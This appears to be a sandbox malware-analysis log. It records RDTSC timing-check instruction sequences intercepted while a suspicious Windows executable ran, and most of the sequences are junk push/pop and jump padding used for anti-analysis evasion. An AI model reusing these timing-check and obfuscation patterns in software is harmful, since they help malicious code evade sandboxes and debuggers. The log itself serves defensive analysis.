Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B803CF second address: B803FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA3F4513F2Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7F52E second address: B7F532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7F532 second address: B7F538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8057A second address: B8057E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B86EC1 second address: B86EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA3F4513F26h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007FA3F4513F2Eh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B86EE2 second address: B86EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8C246 second address: B8C274 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007FA3F4513F26h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 jl 00007FA3F4513F26h 0x00000016 jmp 00007FA3F4513F2Bh 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 jo 00007FA3F4513F26h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8B912 second address: B8B918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8B918 second address: B8B91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8B91C second address: B8B922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8BC1C second address: B8BC3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FA3F4513F31h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ebx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8BDFE second address: B8BE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA3F4E97196h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B929D2 second address: B929D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B92B6E second address: B92B88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B92B88 second address: B92BAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007FA3F4513F2Eh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007FA3F4513F28h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B92BAF second address: B92BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B92BB5 second address: B92BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B92BB9 second address: B92BD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnp 00007FA3F4E97196h 0x00000013 jg 00007FA3F4E97196h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B98347 second address: B9834D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B9834D second address: B98367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B98367 second address: B983A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007FA3F4513F3Eh 0x0000000f jmp 00007FA3F4513F38h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jl 00007FA3F4513F26h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B983A0 second address: B983A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B983A4 second address: B983A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B977FE second address: B97808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B97808 second address: B9786A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Fh 0x00000007 jmp 00007FA3F4513F39h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 jp 00007FA3F4513F31h 0x00000018 popad 0x00000019 jo 00007FA3F4513F46h 0x0000001f pushad 0x00000020 jc 00007FA3F4513F26h 0x00000026 push edi 0x00000027 pop edi 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA3F4513F2Ch 0x00000032 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B98019 second address: B98036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA3F4E97196h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push edx 0x0000000e jc 00007FA3F4E97196h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007FA3F4E97196h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B981B4 second address: B981E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA3F4513F26h 0x0000000a jmp 00007FA3F4513F32h 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA3F4513F34h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA0CF6 second address: BA0CFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA0CFA second address: BA0D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3F4513F34h 0x0000000b popad 0x0000000c jg 00007FA3F4513F34h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B2281A second address: B22824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B682F7 second address: B68395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jbe 00007FA3F4513F32h 0x00000011 jmp 00007FA3F4513F2Ch 0x00000016 pop esi 0x00000017 nop 0x00000018 mov edx, 3B01A9B4h 0x0000001d lea eax, dword ptr [ebp+1247F0AFh] 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007FA3F4513F28h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d call 00007FA3F4513F31h 0x00000042 add dword ptr [ebp+122D2FFBh], ecx 0x00000048 pop edi 0x00000049 sub dword ptr [ebp+122D58DEh], esi 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jl 00007FA3F4513F26h 0x00000059 jmp 00007FA3F4513F37h 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68395 second address: B683CF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA3F4E971ADh 0x00000008 jmp 00007FA3F4E971A7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA3F4E971A6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68A1F second address: B68A31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68A31 second address: B68A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xor dword ptr [esp], 13CFADD0h 0x0000000d movsx edi, si 0x00000010 sub di, D900h 0x00000015 push 4DD799B4h 0x0000001a push eax 0x0000001b push edx 0x0000001c jo 00007FA3F4E9719Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68A55 second address: B68A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68A59 second address: B68A5E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68AEB second address: B68AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68B5F second address: B68B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68B69 second address: B68BDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FA3F4513F28h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c jmp 00007FA3F4513F38h 0x00000031 jmp 00007FA3F4513F30h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68BDD second address: B68BEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6934F second address: B69353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69353 second address: B69379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 ja 00007FA3F4E971B8h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA3F4E971A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69379 second address: B6937D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6937D second address: B693B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007FA3F4E9719Fh 0x0000000c push 0000001Eh 0x0000000e mov edx, 0982768Ah 0x00000013 nop 0x00000014 ja 00007FA3F4E9719Eh 0x0000001a jnl 00007FA3F4E97198h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jns 00007FA3F4E97198h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6975C second address: B6976B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6976B second address: B69775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69775 second address: B69779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69779 second address: B697DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FA3F4E97198h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D1D45h], esi 0x00000029 lea eax, dword ptr [ebp+1247F0AFh] 0x0000002f call 00007FA3F4E971A4h 0x00000034 add dword ptr [ebp+122D2FD8h], edx 0x0000003a pop edi 0x0000003b adc edi, 3D766AC6h 0x00000041 nop 0x00000042 js 00007FA3F4E971A4h 0x00000048 push eax 0x00000049 push edx 0x0000004a jng 00007FA3F4E97196h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B697DF second address: B697FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FA3F4513F34h 0x0000000f jmp 00007FA3F4513F2Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B697FC second address: B4D518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FA3F4E97196h 0x00000009 jg 00007FA3F4E97196h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 movzx ecx, bx 0x00000016 call dword ptr [ebp+122D3712h] 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B9FEAA second address: B9FECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA3F4513F35h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA018F second address: BA01A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FA3F4E97196h 0x0000000d jl 00007FA3F4E97196h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA01A2 second address: BA01C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA3F4513F2Fh 0x0000000c jp 00007FA3F4513F26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA0328 second address: BA033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA3F4E97196h 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007FA3F4E97196h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA033B second address: BA0345 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3F4513F2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA05CB second address: BA05E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA05E0 second address: BA062A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007FA3F4513F26h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FA3F4513F45h 0x00000014 jmp 00007FA3F4513F2Ah 0x00000019 jmp 00007FA3F4513F35h 0x0000001e jmp 00007FA3F4513F37h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA08F7 second address: BA08FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA67C1 second address: BA67C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA67C5 second address: BA67CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B2E20C second address: B2E210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA567B second address: BA5683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA5683 second address: BA568B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA5BE4 second address: BA5BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA5BE8 second address: BA5BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA5231 second address: BA523F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA523F second address: BA5253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F30h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA6035 second address: BA604A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E9719Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA604A second address: BA6051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA6051 second address: BA606D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA3F4E971A2h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA61D6 second address: BA61F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA3F4513F2Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA61F3 second address: BA61F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA61F7 second address: BA61FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA61FD second address: BA6203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA64DA second address: BA64E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA64E2 second address: BA651F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A1h 0x00000007 pushad 0x00000008 ja 00007FA3F4E97196h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jc 00007FA3F4E971AFh 0x0000001c jmp 00007FA3F4E971A3h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA651F second address: BA6559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F35h 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FA3F4513F26h 0x00000011 jmp 00007FA3F4513F39h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BB0254 second address: BB026B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B2794F second address: B27953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B27953 second address: B27967 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA3F4E971A2h 0x0000000c js 00007FA3F4E97196h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAECA0 second address: BAECA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAECA4 second address: BAECAE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAEDD8 second address: BAEDDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAF0DA second address: BAF0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA3F4E97196h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BAF0E6 second address: BAF0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
